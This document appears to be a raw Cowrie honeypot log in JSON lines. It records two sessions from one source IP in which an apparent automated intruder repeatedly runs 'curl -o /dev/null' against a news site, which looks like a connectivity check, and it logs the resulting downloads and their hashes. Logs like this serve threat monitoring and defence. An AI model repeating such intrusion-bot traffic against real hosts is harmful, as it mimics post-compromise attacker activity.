{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.325408Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.356596Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.357743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.361557Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.364096Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.367309Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.368275Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.369951Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.389081Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.391168Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.393163Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.393920Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.406260Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.407788Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.410789Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.429399Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.437504Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.438471Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.450205Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.457747Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.458841Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.482422Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.483440Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.503208Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.504238Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.505478Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.510845Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.515142Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.519286Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.520142Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.542279Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.547230Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.548330Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.553669Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.554996Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.558974Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.559936Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.560825Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.566697Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.569130Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.576834Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.585778Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.589976Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.591061Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.595302Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.597021Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.599342Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.600315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.610644Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.634783Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.640468Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.641604Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.647513Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.649065Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.650320Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.654868Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.663192Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.682265Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.683444Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.686295Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.693117Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.704218Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.705208Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.736066Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.737196Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.745159Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.752860Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.753819Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.758199Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.773952Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.778492Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.779612Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.783681Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.790290Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.791343Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.817820Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
